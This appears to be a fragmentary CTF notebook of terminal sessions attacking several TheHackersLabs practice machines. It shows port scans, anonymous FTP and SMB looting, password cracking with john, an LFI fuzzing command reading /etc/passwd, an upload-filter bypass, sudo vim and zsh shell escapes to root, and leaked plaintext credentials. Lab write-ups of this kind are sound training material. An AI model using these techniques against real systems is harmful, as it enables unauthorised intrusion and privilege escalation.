(base) yolo@yolo:~$ nmap -sV -Pn 10.161.167.222
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 22:11 CST
Nmap scan report for 10.161.167.222
Host is up (0.81s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.65 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
(base) yolo@yolo:~$ ftp 10.161.167.222
Connected to 10.161.167.222.
220 Welcome zappskred.
Name (10.161.167.222:yolo): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> help
Commands may be abbreviated.  Commands are:

!        delete      hash     mlsd     pdir      remopts   struct
$        dir         help     mlst     pls       rename    sunique
account  disconnect  idle     mode     pmlsd     reset     system
append   edit        image    modtime  preserve  restart   tenex
ascii    epsv        lcd      more     progress  rhelp     throttle
bell     epsv4       less     mput     prompt    rmdir     trace
binary   epsv6       lpage    mreget   proxy     rstatus   type
bye      exit        lpwd     msend    put       runique   umask
case     features    ls       newer    pwd       send      unset
cd       fget        macdef   nlist    quit      sendport  usage
cdup     form        mdelete  nmap     quote     set       user
chmod    ftp         mdir     ntrans   rate      site      verbose
close    gate        mget     open     rcvbuf    size      xferbuf
cr       get         mkdir    page     recv      sndbuf    ?
debug    glob        mls      passive  reget     status
ftp> ls
229 Entering Extended Passive Mode (|||58817|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              28 Oct 29 20:59 login.txt
-rw-r--r--    1 0        0              65 Oct 29 21:23 secret.txt
226 Directory send OK.
ftp> get login.txt
local: login.txt remote: login.txt
229 Entering Extended Passive Mode (|||6845|)
150 Opening BINARY mode data connection for login.txt (28 bytes).
100% |*******************************************************************|    28        5.08 KiB/s    00:00 ETA
226 Transfer complete.
28 bytes received in 00:00 (3.04 KiB/s)
ftp> get secret.txt
local: secret.txt remote: secret.txt
229 Entering Extended Passive Mode (|||51043|)
150 Opening BINARY mode data connection for secret.txt (65 bytes).
100% |*******************************************************************|    65        9.05 KiB/s    00:00 ETA
226 Transfer complete.
65 bytes received in 00:00 (6.08 KiB/s)
ftp> bye
221 Goodbye.
(base) yolo@yolo:~$ ls
8c5852e6-56fe-4474-9fc7-70123454c347.gif  key  login.txt  nfspy_mount  pattern.txt  secret.txt  test1  Desktop  key.pub  miniforge3  ntfs.db  reports  snap  test2
(base) yolo@yolo:~$ cat login.txt
puerto 4444
coffee
GoodLuck
(base) yolo@yolo:~$ cat secret.txt
0jO cOn 31 c4fe 813n p23p424dO, 4 v3c35 14 pista 357a 3n 14 7424
~$ wget http://10.161.167.222/cuatrocuatroveces/Sup3rP4ss.rar
~$ rar2john Sup3rP4ss.rar > tmp
~$ john tmp --wordlist=/snap/seclists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 32 OpenMP threads
Note: Passwords longer than 10 [worst case UTF-8] to 32 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
reema            (Sup3rP4ss.rar)
1g 0:00:00:19 DONE (2025-11-02 23:22) 0.05056g/s 4296p/s 4296c/s 4296C/s tracymcgrady..llandudno
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Got the archive password.
(base) yolo@yolo:~/Desktop/timu$ unrar x Sup3rP4ss.rar
UNRAR 7.00 freeware Copyright (c) 1993-2024 Alexander Roshal
Extracting from Sup3rP4ss.rar
Enter password (will not be echoed) for Sup3rP4ss.txt:
Extracting  Sup3rP4ss.txt                                                 OK
All OK
(base) yolo@yolo:~/Desktop/timu$ cat Sup3rP4ss.txt
Intenta probar con más >> 3spuM4
zappskred@TheHackersLabs-ZAPP:~$ ls
user.txt
zappskred@TheHackersLabs-ZAPP:~$ cat user.txt
ZWwgbWVqb3?????????=
zappskred@TheHackersLabs-ZAPP:~$ cat .bash_history
ftp
sudo apt install ftp
sudo apt install vsftpd -y
sudo su
su
clear
sudo apt install vsftpd -y
ftpdç
ftpd
cd /etc/
ls
ip a
cls
clear
ip a
sudo dhclient
clear
ip a
sudo reboot now
cat /etc/sudoers
sudo cat /etc/sudoers
sudo su
sudo root
exit
clear
ifconfig
ip a
ssh-keygen -f '/home/kali/.ssh' -R '192.168.1.34'
ssh-keygen -f '/home/kali/ .ssh' -R '192.168.1.34'
sudo ssh-keygen -f '/home/kali/ .ssh' -R '192.168.1.34'
exit
clear
ls
clear
exit
clear
passwd
exit
clear
ls
cat
clear
sudo apt install zsh
exit
clear
whoami
sudo -l
clear
sudo zsh
sudo su
sudo root
exit
ls
sudo -l
sudo zsh
clear
echo "exitosocafe" | base64
exit
ls
ls -lash
cp user.txt user.txt
mv user.txt user.txt
rm user.txt
ls
clear
echo "el mejor cafe" | base64 > user.txt
ls
cd ..
system apt install apache2
exit
clear
sudo zsh
clear
nano ~/.bashrc
cat /etc/issue
exit
sudo zsh
clear
sudo zsh
clear
sudo zsh
exit
echo '
███████╗ █████╗ ██████╗ ██████╗
╚══███╔╝██╔══██╗██╔══██╗██╔══██╗
  ███╔╝ ███████║██████╔╝██████╔╝
 ███╔╝  ██╔══██║██╔═══╝ ██╔═══╝
███████╗██║  ██║██║     ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝
' | sudo tee /etc/issue.net > /dev/null
clear
sudo zsh
exit
sudo zsh
exit
zappskred@TheHackersLabs-ZAPP:~$ sudo -l
sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known
[sudo] password for zappskred:
Sorry, try again.
[sudo] password for zappskred:
Matching Defaults entries for zappskred on TheHackersLabs-ZAPP:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zappskred may run the following commands on TheHackersLabs-ZAPP:
    (root) /bin/zsh
zappskred@TheHackersLabs-ZAPP:~$ sudo /bin/zsh
sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known
TheHackersLabs-ZAPP# cat ~/root.txt
c2llbXByZSBlcyBudWV???????==
TheHackersLabs-ZAPP#
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.208.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-05 21:03 CST
Nmap scan report for 10.161.208.161
Host is up (0.0053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.65 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.58 seconds
(base) yolo@yolo:~$ snmpwalk -v 2c -c public 10.161.208.161 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
NET-SNMP-EXTEND-MIB::nsExtendOutputFull = No more variables left in this MIB View (It is past the end of the MIB tree)
(base) yolo@yolo:~$ snmpwalk -v 2c -c security 10.161.208.161 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."mycreds" = STRING: ethan:1N3qVgwNB6cZmNSyr8iX$!
if (preg_match('/.+\.ph(p|ps|tml)/', $fileName)) {
    echo "Extensión no permitida.";
    die();
}

if (!preg_match('/^.+\.[a-z]{2,3}g$/', $fileName)) {
    echo "Solo se permiten imagenes.";
    die();
}
// look here: the extension check only pins down the last letter, and svg also happens to end in g
foreach (array($contentType, $MIMEtype) as $type) {
    if (!preg_match('/image\/[a-z]{2,3}g/', $type)) {
        echo "Solo se permiten imagenes.";
        die();
    }
}

if ($_FILES["uploadFile"]["size"] > 500000) {
    echo "Archivo demasiado grande.";
    die();
}

if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
    displayHTMLImage($target_file);
} else {
    echo "Ocurrio un error al subir el archivo.";
}
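As an added illustration (not code from the page or from the target application), the Python below models the three PHP checks above with the same regexes and runs them over constructed sample uploads, beside a hardened version that allow-lists extensions, requires the declared Content-Type to match, and verifies the file's magic bytes on the server; `original_filter`, `hardened_filter` and the sample bytes are my own names and data.

```python
import re
import secrets


# Python model of the page's PHP checks: same regexes, same order, same messages.
def original_filter(name, declared_type, sniffed_type):
    if re.search(r'.+\.ph(p|ps|tml)', name):
        return "Extensión no permitida."
    # Only the final letter of the extension is really pinned down here:
    # .png, .jpg, .jpeg and .svg all end in "g", so SVG (scriptable XML) passes,
    # while a harmless .gif is rejected.
    if not re.search(r'^.+\.[a-z]{2,3}g$', name):
        return "Solo se permiten imagenes."
    for t in (declared_type, sniffed_type):
        # Unanchored: "image/svg+xml" contains "image/svg" and passes too.
        if not re.search(r'image/[a-z]{2,3}g', t):
            return "Solo se permiten imagenes."
    return "OK"


# Hardened replacement: explicit allow-list keyed by extension, giving the MIME
# type each one must declare and the magic bytes the content must start with.
ALLOWED = {
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}


def hardened_filter(name, declared_type, head):
    """Return a safe server-chosen filename, or None to reject the upload.

    `head` is the first bytes of the uploaded file as read on the server; the
    client-supplied name and Content-Type are never trusted on their own.
    """
    base = name.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return None                      # .svg, .php, .phtml, .php.png all stop here
    mime, magics = ALLOWED[ext]
    if declared_type.split(";")[0].strip().lower() != mime:
        return None
    if not any(head.startswith(m) for m in magics):
        return None                      # content does not match the claimed format
    # Random server-side name with an allow-listed extension: the client never
    # chooses what the stored file is called.
    return f"{secrets.token_hex(8)}.{ext}"


# Constructed sample uploads (not from the page): name, declared type, first bytes.
PNG_HEAD = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR"
SVG_HEAD = b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>"
SAMPLES = [
    ("photo.png", "image/png", PNG_HEAD),
    ("shell.php", "image/png", PNG_HEAD),
    ("logo.svg", "image/svg+xml", SVG_HEAD),
    ("photo.gif", "image/gif", b"GIF89a" + b"\x00" * 8),
]


def compare(samples=SAMPLES):
    """Run both filters over the samples; returns {name: (original, hardened)}."""
    out = {}
    for name, ctype, head in samples:
        out[name] = (original_filter(name, ctype, ctype),
                     hardened_filter(name, ctype, head))
    return out


if __name__ == "__main__":
    for name, (orig, hard) in compare().items():
        verdict = "accepted as " + hard if hard else "rejected"
        print(f"{name:12} original={orig!r:30} hardened={verdict}")
```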
(base) yolo@yolo:~$ ssh ethan@10.161.208.161
The authenticity of host '10.161.208.161 (10.161.208.161)' can't be established.
ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.161.208.161' (ED25519) to the list of known hosts.
ethan@10.161.208.161's password:
Linux photographer 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠶⣞⡩⠽⢷⣆⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣀⡤⢿⠀⢹⠖⠒⡛⠧⠐⠉⣧⠀⠀⠀⠀
⠀⢀⡠⠴⣲⣭⡁⠲⠇⢈⡑⢚⠪⠭⠤⠤⢄⣀⣿⠀⠀⠀⠀
⢠⠃⠤⠄⠉⠉⠀⠐⠉⣡⠞⠁⢀⡴⠞⠉⢉⣩⠿⠶⣄⠀
⢸⠀⠀⠀⠀⡄⠀⠀⣰⠃⠀⢠⡞⠀⠀⡴⢋⣴⣿⣿⣷⡘⣆
⢸⠀⠀⠀⠀⡇⠀⠀⡏⠀⠀⣾⠀⠀⡜⢀⣾⣿⣤⣾⣿⡇⣿
⢨⠀⠀⠀⠀⡇⠀⠀⣇⠀⠀⡏⠀⠀⡇⢸⣿⣿⣿⣿⣿⢁⡏
⠈⠀⣀⠀⠀⣷⠀⠀⠘⢄⠀⢳⠀⠀⡇⠸⣿⣿⣹⡿⢃⡼⠁
⢰⡀⠛⠓⠀⢻⠀⠀⠀⠀⢙⣻⡷⠦⣼⣦⣈⣉⣡⡴⠚⠀⠀
⠀⢷⣄⡀⠀⠀⠀⢀⡠⠖⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠉⠛⠓⠒⠚⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀Photographer
Last login: Tue Oct 28 19:47:04 2025 from 192.168.1.17
ethan@photographer:~$ ls
creds.txt  user.txt
Privilege escalation here goes through the disk group.
ethan@photographer:~$ id
uid=1001(ethan) gid=1001(ethan) grupos=1001(ethan),6(disk)
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.144.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-09 12:20 CST
Nmap scan report for 10.161.144.56
Host is up (0.86s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
80/tcp open  http    nginx 1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.145.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-09 13:17 CST
Nmap scan report for 10.161.145.95
Host is up (0.73s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
(base) yolo@yolo:~$ dirsearch -u http://lavashop.thl/
/home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

Task Completed
(base) yolo@yolo:~$ dirsearch -u http://lavashop.thl/pages/
/home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ wfuzz -w /snap/seclists/1214/Discovery/Web-Content/common.txt -u http://lavashop.thl/pages/products.php?FUZZ=/etc/passwd --hh 1002
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://lavashop.thl/pages/products.php?FUZZ=/etc/passwd
Total requests: 4750

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
(base) yolo@yolo:~/Desktop/tools$ gdb binary.elf
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 209 pwndbg commands. Type pwndbg [filter] for a list.
pwndbg: created 13 GDB functions (can be used with print/break). Type help function to see them.
Reading symbols from binary.elf...
(No debugging symbols found in binary.elf)
------- tip of the day (disable with set show-tips off) -------
Want to NOP some instructions? Use patch <address> 'nop; nop; nop'
pwndbg> target extended-remote 10.161.145.95:1337
Remote debugging using 10.161.145.95:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /usr/lib/debug/.build-id/8a/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target...
Reading /lib64/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target...
Reading /lib64/.debug/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target...
Reading /usr/lib/debug//lib64/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target...
Reading /usr/lib/debug/lib64//6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
Reading /usr/lib/debug/.build-id/a7/52f6d1c0edab0671d291d55c36296a3c55f0c2.debug from remote target...
0x00007ffff7fe5a50 in ?? () from target:/lib64/ld-linux-x86-64.so.2
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────
 RAX  0
 RBX  0
 RCX  0
 RDX  0
 RDI  0
 RSI  0
 R8   0
 R9   0
 R10  0
 R11  0
 R12  0
 R13  0
 R14  0
 R15  0
 RBP  0
 RSP  0x7fffffffed00 ◂— 1
 RIP  0x7ffff7fe5a50 ◂— mov rdi, rsp
──────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────
 ► 0x7ffff7fe5a50    mov    rdi, rsp     RDI => 0x7fffffffed00 ◂— 1
   0x7ffff7fe5a53    call   0x7ffff7fe6650              <0x7ffff7fe6650>
(base) yolo@yolo:~/Desktop/tools$ ssh -i rodri_key Rodri@10.161.145.95
The authenticity of host '10.161.145.95 (10.161.145.95)' can't be established.
ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:31: [hashed name]
    ~/.ssh/known_hosts:36: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.161.145.95' (ED25519) to the list of known hosts.
Linux Thehackerslabs-LavaShop 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Rodri@Thehackerslabs-LavaShop:~$
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.149.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-09 21:34 CST
Nmap scan report for 10.161.149.147
Host is up (0.76s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.35 seconds
(base) yolo@yolo:~$ dirsearch -u http://10.161.149.147/
/home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ zip2john File.zip > ziphash
ver 2.0 File.zip/Credentials/ is not encrypted, or stored with non-handled compression type
(base) yolo@yolo:~$ john ziphash --wordlist=/snap/seclists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size [KiB]) is 1 for all loaded hashes
Will run 32 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
121288           (File.zip/Credentials/Credentials.txt)
1g 0:00:00:00 DONE (2025-11-09 22:16) 3.704g/s 242725p/s 242725c/s 242725C/s 123456..ryanscott
Use the "--show" option to display all of the cracked passwords reliably
Session completed
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.159.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-10 18:21 CST
Nmap scan report for 10.161.159.35
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds
(base) yolo@yolo:~$ curl -l http://10.161.159.35/secret/
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <title>Secreto de Dragon Machine</title>
  <style>
    body { background-color: #222; color: #eee; font-family: 'Courier New', Courier, monospace; padding: 2em; text-align: center; }
    .riddle { background-color: #333; padding: 2em; border-radius: 12px; margin: 0 auto; max-width: 600px; box-shadow: 0 0 10px #f38ba8; }
  </style>
</head>
<body>
  <div class="riddle">
    <h1>Para Dragon:</h1>
    <p>“En la sombra de la cueva, un guardián vigila sin ver,<br>
    Su nombre es la clave, su fuerza, un misterio por resolver.<br>
    Intenta sin pausa, las llaves del dragón,<br>
    Y hallarás el secreto que abre la prisión.”</p>
  </div>
</body>
</html>
(base) yolo@yolo:~$ ssh dragon@10.161.159.35
The authenticity of host '10.161.159.35 (10.161.159.35)' can't be established.
ED25519 key fingerprint is SHA256:BffrSAW4tUB+TWrywXkSWeUxLcFSs0YSko5us+xdXQo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.161.159.35' (ED25519) to the list of known hosts.
dragon@10.161.159.35's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-71-generic x86_64)
System information as of mar 05 ago 2025 08:13:17 UTC
  System load:  0.84               Processes:               105
  Usage of /:   40.7% of 11.21GB   Users logged in:         0
  Memory usage: 9%                 IPv4 address for enp0s3: 192.168.18.184
  Swap usage:   0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment.
El mantenimiento de seguridad expandido para Applications está desactivado
Se pueden aplicar 80 actualizaciones de forma inmediata. Para ver estas actualizaciones adicionales, ejecute: apt list --upgradable
Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales. Vea https://ubuntu.com/esm o ejecute «sudo pro status»
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Tue Aug  5 08:13:55 2025 from 192.168.18.16
dragon@TheHackersLabs-Dragon:~$ ls -la
total 40
drwxr-x--- 5 dragon dragon 4096 ago  3 01:05 .
drwxr-xr-x 3 root   root   4096 jul 31 20:39 ..
-rw------- 1 dragon dragon 2943 ago  5 08:22 .bash_history
-rw-r--r-- 1 dragon dragon  220 mar 31  2024 .bash_logout
-rw-r--r-- 1 dragon dragon 3771 mar 31  2024 .bashrc
drwx------ 2 dragon dragon 4096 jul 31 20:44 .cache
drwxrwxr-x 3 dragon dragon 4096 jul 31 20:58 .local
-rw-r--r-- 1 dragon dragon  807 mar 31  2024 .profile
drwx------ 2 dragon dragon 4096 jul 31 20:40 .ssh
-rw-r--r-- 1 dragon dragon    0 ago  1 01:04 .sudo_as_admin_successful
-rw-r--r-- 1 root   root     33 ago  1 01:04 user.txt
dragon@TheHackersLabs-Dragon:~$ cat user.txt
e1f9c2e8a1d8477f9b3f6cd298??????
dragon@TheHackersLabs-Dragon:~$ sudo -l
Matching Defaults entries for dragon on TheHackersLabs-Dragon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User dragon may run the following commands on TheHackersLabs-Dragon:
    (ALL) NOPASSWD: /usr/bin/vim
dragon@TheHackersLabs-Dragon:~$ sudo /usr/bin/vim -c ':!/bin/sh'

# id
uid=0(root) gid=0(root) groups=0(root)
# cd
# ls -la
total 44
drwx------  4 root root 4096 ago  5 08:22 .
drwxr-xr-x 23 root root 4096 jul 31 20:21 ..
-rw-------  1 root root 2592 ago  5 08:22 .bash_history
-rw-r--r--  1 root root 3106 abr 22  2024 .bashrc
-rw-r--r--  1 root root  560 ago  4 13:33 congrats.txt
-rw-------  1 root root   33 ago  1 01:17 .lesshst
drwxr-xr-x  3 root root 4096 jul 31 21:04 .local
-rw-r--r--  1 root root  161 abr 22  2024 .profile
-rw-------  1 root root   33 ago  1 01:10 root.txt
drwx------  2 root root 4096 jul 31 20:39 .ssh
-rw-------  1 root root  743 ago  5 08:22 .viminfo
# cat root.txt
7a4d1b35eebf4aefa5f1b0198b??????
Breaking down the privilege-escalation payload: the relevant line from vim's own option help is
-c <command> Execute <command> after loading the first file
User thl may run the following commands on nodeception:
    (ALL) NOPASSWD: /usr/bin/vi
    (ALL : ALL) ALL
This is definitely a bug; in the end I could only brute-force the password.
thl@nodeception:~$ sudo su
[sudo] password for thl:
root@nodeception:/home/thl# id
uid=0(root) gid=0(root) groups=0(root)
root@nodeception:/home/thl# cd && cat root.txt
THL_QzXeoMuYRcJtWHabn??????
❯ nmap -p- --min-rate 5000 10.161.161.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-10 23:10 CST
Nmap scan report for 10.161.161.139
Host is up (0.00064s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
65535/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 15.04 seconds
❯ nmap -sCV -p 65535 10.161.161.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-10 23:11 CST
Nmap scan report for 10.161.161.139
Host is up (0.00059s latency).

PORT      STATE SERVICE VERSION
65535/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
|   256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
|_  256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.63 seconds
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        backup          Disk
        IPC$            IPC       IPC Service (Samba Server)
        nobody          Disk      Home Directories
SMB1 disabled -- no workgroup available
❯ smbclient //10.161.161.139/backup -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul  7 01:02:53 2025
  ..                                  D        0  Mon Jul  7 02:15:13 2025
  secretito.zip                       N      216  Mon Jul  7 01:02:31 2025

                19480400 blocks of size 1024. 16245492 blocks available
smb: \> get secretito.zip
getting file \secretito.zip of size 216 as secretito.zip (19.2 KiloBytes/sec) (average 19.2 KiloBytes/sec)
smb: \> q
But I found the archive is encrypted, so I'll crack it with john.
❯ bkcrack -L secretito.zip
bkcrack 1.8.0 - 2025-08-18
Archive: secretito.zip
Index Encryption Compression CRC32    Uncompressed  Packed size  Name
----- ---------- ----------- -------- ------------ ------------ ----------------
    0 ZipCrypto  Store       f2e5967a           22           34 password
❯ zip2john secretito.zip > ziphash
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0
Note: It is normal for some outputs to be very large
❯ john ziphash --wordlist=/snap/seclists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Cracked 1 password hash (is in /home/yolo/Desktop/tools/john/run/john.pot), use "--show"
No password hashes left to crack (see FAQ)
❯ john ziphash --show
secretito.zip/password:sebastian:password:secretito.zip::secretito.zip
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use bunker;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
